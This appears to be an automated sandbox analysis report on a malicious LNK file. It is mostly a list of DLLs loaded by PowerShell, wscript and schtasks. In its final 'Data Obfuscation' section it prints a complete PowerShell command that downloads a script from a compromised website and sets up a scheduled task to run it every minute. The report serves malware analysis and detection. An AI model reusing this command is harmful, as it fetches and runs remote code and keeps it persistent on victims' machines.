      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: G9eWTvswoH.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
